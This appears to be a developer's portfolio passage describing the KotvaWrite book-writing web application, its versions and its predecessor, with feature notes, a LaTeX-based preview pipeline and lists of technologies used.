a) Be used to let oneself to become aware about possible problems (Problems) that may occur, e.g. when transferring elements in a slightly incomplete way, e.g. from project to project, but forgetting to transfer something. Where possible, "one-click" fixes are available.

b) To confirm something that needs a little more clarification (Clarifications), such as the lengths (in terms of time) of solutions' caches and images that are in some image catalogs but aren't used anywhere. There is also a somewhat similar option in the "browse image catalogs" view, which filters image lists to show only those images that are not yet used anywhere. When one have a lot of pictures, things like that can get forgotten.

c) Let one get manually reminded (Reminders) about something that might need to be / should be checked periodically like e.g. to list writings that are marked as "preparing". It is possible that this functionality could end up somewhere else with a different implementation.

KotvaWrite Stories and KotvaWrite Explanations (2017)

The main purpose of the KotvaWrite has been to make it possible to carry out a large number of layout experiments and adjustments to literary works in a short enough time so that the time spent waiting does not feel long and meaningful results can be reached effortlessly. However, the typesetting system (XeTeX) does not keep up with such a fast pace and that significantly guided the product development and thus it was decided to split it into two different product lines, one (KotvaWrite Stories) producing HTML-based works with a wider range of style options and the other (KotvaWrite Explanations) producing both PDF- and HTML-based works, but with slightly more limited layout and adjustment options.

JDK 1.8, JPA, REST, EclipseLink, Eclipse, Visual Paradigm for UML, Foundation, Backgrid, Backbone, Underscore.js, SASS, jQuery, HTML5, CSS 2.1/3, MySQL, MariaDB, MongoDB, JavaScript, NoSQL, JNDI, Tomcat 8, Digital Ocean, Putty, Linux command line tools, TeX, LaTeX, XeLaTeX, Loadster, NeoLoad, New Relic, Datadog, Nginx, HAProxy, Parse API, UML, Git, JUnit, Photoshop, MySQL Workbench

Process for generating preview images for a single writing

Java-based code generates a .tex file on the server side and then calls xelatex.exe or pdflatex.exe to produce a .pdf file having its structure and styling mostly affected by the settings made in the web interface. The XeTeX typesetting system makes its best effort to compile the final results on one run, but sometimes it needs to be instructed make another set of calculations after first run. Apache PDFBox is used to generate thumbnails of individual pages for viewing in the web interface.

KotvaWrite 2

It is still a web application for producing book-length, online readable works. The application consists of four parts that can be used for these:

  • Importing of material to be used in writings from multitude of sources.
  • Arranging material and writings.
  • Text writing and editing, compiling writings into a literary work that gets generated on the basis of parameters that affect layout, styling and presentation.

The most significant renovation compared to the previous version has happened at the interface level as it has been completely redesigned. The application has been designed using responsive design to substantially improve the user experience. Some additional features have been added since then (including an automatically generated PDF file and fine-tuning of the print version of the HTML version).

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Foundation, Backgrid, Backbone, SASS, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, iText, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

KotvaWrite v1.0

KotvaWrite is a useful web application for creating and editing text-based material that can take a book-like structure (in essence, multiple writings placed in collections that can be combined into a larger whole), which can be exported as a PDF file or made readable by others in HTML format. Text can be accompanied by images, illustrations, drawings and certain other types of "attachments" often seen in blog posts.

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

Ancoaarmade (predecessor of KotvaWrite)

The idea was to develop an web application that would serve its users' in needs like: writing down observations, self-learning, organising and publishing information, producing information, organising thoughts and remembering things. The final product will be a set of writings, which can be made public if desired, and which may consist of various collected or generated materials such as video clips, diagrams, pictures, drawings, etc. illustrative material. Material can be brought in from external data sources or from a mobile phone.

Java EE 6, JAXB, JPA, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, CloudBees, Amazon AWS, Jasmine, DOH Robot, UML, Microsoft Project, JIRA, Mylyn, Git, PureTest, CodePro Analytix, PMD, JUnit, Photoshop, Fireworks, SHA1, PayPal API, Chrome extension, Firefox Add-on, Mockingbird, Adobe AIR, MySQL Workbench, Jenkins, continuous integration, REST, async servlets + filters, refactoring, design patterns, naming conventions